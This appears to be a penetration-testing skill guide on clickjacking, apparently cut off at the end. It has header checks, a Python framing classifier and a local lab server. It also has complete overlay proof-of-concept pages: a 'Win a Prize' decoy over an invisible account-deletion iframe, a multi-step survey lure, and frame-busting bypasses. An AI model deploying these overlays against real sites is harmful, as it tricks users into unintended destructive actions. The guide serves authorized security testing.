performing-clickjacking-attack-test
Testing web applications for clickjacking vulnerabilities by assessing frame embedding controls and crafting proof-of-concept overlay attacks during authorized security assessments.
# Performing Clickjacking Attack Test
## When to Use
- During authorized penetration tests when assessing UI redressing vulnerabilities
- When testing whether sensitive actions (delete account, transfer funds, change settings) can be performed via clickjacking
- For evaluating the effectiveness of X-Frame-Options and Content-Security-Policy frame-ancestors directives
- When assessing applications that process one-click actions without additional confirmation
- During security audits of applications handling financial transactions or account management
## Prerequisites
- **Authorization**: Written penetration testing agreement for the target
- **Web browser**: Modern browser for testing iframe embedding
- **Local web server**: Python `http.server` or similar for hosting PoC pages
- **Burp Suite**: For examining response headers
- **HTML/CSS knowledge**: For crafting clickjacking overlay pages
- **curl**: For checking framing headers on target pages
> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
## Workflow
### Step 1: Check Frame Embedding Protections
Examine response headers for anti-clickjacking defenses.
```bash
# Check X-Frame-Options header
# Note: -I sends a HEAD request; if a header looks missing, re-check with a GET
# (curl -s -D - -o /dev/null URL), since some apps only set it on GET responses.
curl -s -I "https://target.example.com/" | grep -i "x-frame-options"
# Expected values:
# X-Frame-Options: DENY (blocks all framing)
# X-Frame-Options: SAMEORIGIN (allows same-origin framing)
# X-Frame-Options: ALLOW-FROM https://trusted.com (deprecated, limited support)

# Check Content-Security-Policy frame-ancestors directive
# (this grep also matches Content-Security-Policy-Report-Only, which reports but does not block)
curl -s -I "https://target.example.com/" | grep -i "content-security-policy"
# Look for: frame-ancestors 'none' or frame-ancestors 'self'
# frame-ancestors 'none' = equivalent to DENY
# frame-ancestors 'self' = equivalent to SAMEORIGIN

# Test multiple sensitive pages
for page in / /account/settings /account/delete /transfer \
            /admin/dashboard /change-password /change-email; do
    echo -n "$page: "
    headers=$(curl -s -I "https://target.example.com$page")
    xfo=$(echo "$headers" | grep -i "x-frame-options" | tr -d '\r')
    csp=$(echo "$headers" | grep -i "content-security-policy" | grep -o "frame-ancestors[^;]*" | tr -d '\r')
    if [ -z "$xfo" ] && [ -z "$csp" ]; then
        echo "NO PROTECTION"
    else
        echo "${xfo:-none} | ${csp:-none}"
    fi
done

# Check if JavaScript frame-busting is used (weak protection)
curl -s "https://target.example.com/" | grep -i "top.location\|parent.location\|frameElement"
```
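A Python classifier for the Step 1 checks, added here as an example (not part of the skill): it parses the headers instead of grepping, so it handles a Report-Only CSP (which does not enforce), frame-ancestors taking precedence over X-Frame-Options when both are present, the deprecated ALLOW-FROM form, and JavaScript-only frame busting. The `fetch` helper uses GET because `curl -I` sends HEAD and some apps set these headers only on GET; verdict names and the frame-busting regex are constructed for this example.

```python
import re
import sys
import urllib.request

# Frame-busting idioms the Step 1 grep looks for (pattern constructed for this example).
JS_BUSTER = re.compile(r"top\.location|parent\.location|frameElement|top\s*!==?\s*self")

def frame_ancestors(headers):
    """Return the enforced frame-ancestors source list, or None if no CSP sets one."""
    for name, value in headers:
        # Content-Security-Policy-Report-Only only reports; it never blocks framing.
        if name.lower() != "content-security-policy":
            continue
        for directive in value.split(";"):
            tokens = directive.split()
            if tokens and tokens[0].lower() == "frame-ancestors":
                return [t.lower() for t in tokens[1:]]
    return None

def assess_framing(headers, body=""):
    """Classify anti-framing posture as 'protected', 'weak' or 'unprotected'."""
    sources = frame_ancestors(headers)
    xfo = next((v.strip().upper() for n, v in headers
                if n.lower() == "x-frame-options"), None)
    # Browsers that support frame-ancestors ignore X-Frame-Options when both are present.
    if sources is not None:
        if any(s in ("*", "http:", "https:") for s in sources):
            return "unprotected", "frame-ancestors allows any origin: " + " ".join(sources)
        return "protected", "frame-ancestors " + (" ".join(sources) or "'none'")
    if xfo in ("DENY", "SAMEORIGIN"):
        return "protected", "X-Frame-Options: " + xfo
    if xfo and xfo.startswith("ALLOW-FROM"):
        return "weak", "ALLOW-FROM is deprecated; modern browsers ignore it and allow framing"
    if xfo:
        return "unprotected", "unrecognised X-Frame-Options value is ignored: " + xfo
    if JS_BUSTER.search(body):
        return "weak", "JavaScript frame-busting only; no header enforcement"
    return "unprotected", "no X-Frame-Options and no frame-ancestors directive"

def fetch(url):
    """GET the page: curl -I sends HEAD, and some apps only set these headers on GET."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        body = resp.read(200_000).decode("utf-8", "replace")
        return list(resp.headers.items()), body

if __name__ == "__main__":
    for url in sys.argv[1:]:
        print(url, *assess_framing(*fetch(url)))
```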
### Step 2: Test Basic Iframe Embedding
Attempt to embed the target page in an iframe to confirm vulnerability.
```html
<!-- basic-frame-test.html -->
<!DOCTYPE html>
<html>
  <head><title>Clickjacking Frame Test</title></head>
  <body>
    <h1>Frame Embedding Test</h1>
    <p>If the target page loads below, it is vulnerable to clickjacking.</p>
    <!-- Test basic framing -->
    <iframe src="https://target.example.com/account/settings"
            width="800" height="600"
            style="border: 2px solid red;">
    </iframe>
    <p>If you see "Refused to display" in console or blank iframe,
       the page has frame protection.</p>
  </body>
</html>
```
```bash
# Host the test page
cd /tmp
cat > frame-test.html << 'EOF'
<html>
<body>
<h1>Clickjacking Test</h1>
<iframe src="https://target.example.com/account/settings"
width="800" height="600"></iframe>
</body>
</html>
EOF
python3 -m http.server 8888
# Open http://localhost:8888/frame-test.html in browser
# Check browser console for framing errors
```
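A local lab target for validating the Step 2 frame test, added here as an example (not part of the skill): it serves one constructed page under several anti-framing postures so the tester can confirm that frame-test.html reports "loads" for the unprotected paths and "refused" for the header-protected ones before pointing it at a real target. The mode paths, port 9000 and the page content are all constructed for this example.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed target page: a visible "sensitive" button to align the frame test against.
PAGE = b"<html><body><h1>Lab target</h1><button>Delete Account</button>%s</body></html>"
# JavaScript-only frame busting, the weak defence Step 1 greps for (served only on /jsbust).
JSBUST = b"<script>if (top !== self) top.location = self.location;</script>"

# Each path serves the same page under a different anti-framing posture.
MODES = {
    "/none": [],
    "/xfo-deny": [("X-Frame-Options", "DENY")],
    "/xfo-sameorigin": [("X-Frame-Options", "SAMEORIGIN")],
    "/csp-none": [("Content-Security-Policy", "frame-ancestors 'none'")],
    "/both": [("X-Frame-Options", "DENY"),
              ("Content-Security-Policy", "frame-ancestors 'none'")],
    "/jsbust": [],
}

def security_headers(path):
    """Anti-framing headers for a mode path; unknown paths are served unprotected."""
    return list(MODES.get(path, []))

def page_body(path):
    """Page bytes for a mode path; only /jsbust carries the frame-busting script."""
    return PAGE % (JSBUST if path == "/jsbust" else b"")

class LabHandler(BaseHTTPRequestHandler):
    def _respond(self, with_body):
        body = page_body(self.path)
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        for name, value in security_headers(self.path):
            self.send_header(name, value)
        self.end_headers()
        if with_body:
            self.wfile.write(body)

    def do_GET(self):
        self._respond(True)

    def do_HEAD(self):  # lets curl -I from Step 1 see the same headers
        self._respond(False)

if __name__ == "__main__":
    # Port 9000 differs from the 8888 hosting frame-test.html, so the framing page is
    # cross-origin and SAMEORIGIN must block it just as DENY does.
    HTTPServer(("127.0.0.1", 9000), LabHandler).serve_forever()
```

Point the iframe in frame-test.html at http://localhost:9000/none, then /xfo-deny, /csp-none and /jsbust in turn; only the header-protected paths should refuse to render.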
### Step 3: Craft Clickjacking Proof of Concept
Build an overlay attack that tricks users into clicking hidden elements.
```html
<!-- clickjacking-poc.html -->
<!DOCTYPE html>
<html>
  <head>
    <title>Win a Prize!</title>
    <style>
      body {
        margin: 0;
        padding: 0;
        font-family: Arial, sans-serif;
      }
      /* Invisible iframe containing target page */
      #target-frame {
        position: absolute;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        opacity: 0.0001; /* Nearly invisible */
        z-index: 2; /* On top of decoy */
        border: none;
      }
      /* Decoy content that tricks the user */
      #decoy {
        position: absolute;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        z-index: 1;
        background: white;
      }
      /* Position the "Click here" button exactly over the target's
         sensitive button (adjust top/left values based on target layout) */
      #click-bait {
        position: absolute;
        top: 350px; /* Align with target's "Delete Account" button */
        left: 400px; /* Align horizontally */
        padding: 15px 30px;
        background: #4CAF50;
        color: white;
        font-size: 18px;
        cursor: pointer;
        border: none;
        border-radius: 5px;
      }
    </style>
  </head>
  <body>
    <!-- Decoy content visible to the user -->
    <div id="decoy">
      <h1 style="text-align:center; margin-top:100px;">
        Congratulations! You Won!
      </h1>
      <p style="text-align:center;">
        Click the button below to claim your prize
      </p>
      <button id="click-bait">CLAIM PRIZE</button>
    </div>
    <!-- Hidden iframe with target's sensitive action -->
    <iframe id="target-frame"
            src="https://target.example.com/account/delete"
            scrolling="no">
    </iframe>
  </body>
</html>
```
### Step 4: Create Multi-Step Clickjacking Attack
For actions requiring multiple clicks, create a multi-step overlay.
```html
<!-- multi-step-clickjacking.html -->
<!DOCTYPE html>
<html>
  <head>
    <title>Complete Survey</title>
    <style>
      #target-frame {
        position: absolute;
        width: 100%;
        height: 100%;
        opacity: 0.0001;
        z-index: 2;
        border: none;
      }
      #step-container {
        text-align: center;
        margin-top: 200px;
        z-index: 1;
        position: relative;
      }
      .step { display: none; }
      .step.active { display: block; }
      .btn {
        padding: 15px 40px;
        font-size: 18px;
        background: #2196F3;
        color: white;
        border: none;
        cursor: pointer;
        margin-top: 20px;
      }
    </style>
  </head>
  <body>
    <div id="step-container">
      <!-- Step 1: Click aligns with "Settings" link on target -->
      <div class="step active" id="step1">
        <h2>Step 1: Select your reward</h2>
        <button class="btn" onclick="nextStep()"
                style="position:absolute; top:200px; left:300px;">
          Gold Package
        </button>
      </div>
      <!-- Step 2: Click aligns with "Delete Account" button -->
      <div class="step" id="step2">
        <h2>Step 2: Confirm your choice</h2>
        <button class="btn" onclick="nextStep()"
                style="position:absolute; top:350px; left:400px;">
          Confirm
        </button>
      </div>
      <!-- Step 3: Click aligns with "Yes, I'm sure" confirmation -->
      <div class="step" id="step3">
        <h2>Step 3: Claim reward!</h2>
        <button class="btn"
                style="position:absolute; top:400px; left:450px;">
          Claim Now!
        </button>
      </div>
    </div>
    <iframe id="target-frame"
            src="https://target.example.com/account/settings">
    </iframe>
    <script>
      var currentStep = 1;
      function nextStep() {
        document.getElementById('step' + currentStep).classList.remove('active');
        currentStep++;
        document.getElementById('step' + currentStep).classList.add('active');
        // Optionally change iframe src for multi-page flows
      }
    </script>
  </body>
</html>
```
### Step 5: Test Frame-Busting Bypass Techniques
If JavaScript-based frame protection is used, attempt to bypass it.
```html
<!-- Bypass frame-busting JavaScript -->
<!-- Technique 1: sandbox attribute blocks top-level navigation -->
<iframe src="https://target.example.com/account/settings"
        sandbox="allow-scripts allow-forms allow-same-origin"
        width="800" height="600">
</iframe>
<!-- sandbox without allow-top-navigation prevents frame-busting -->

<!-- Technique 2: Double framing -->
<!-- If target checks: if (top !== self) top.location = self.location -->
<!-- Frame the page through an intermediate page that also frames -->
<iframe src="intermediate.html" width="800" height="600"></iframe>
<!-- intermediate.html contains: <iframe src="https://target.example.com
```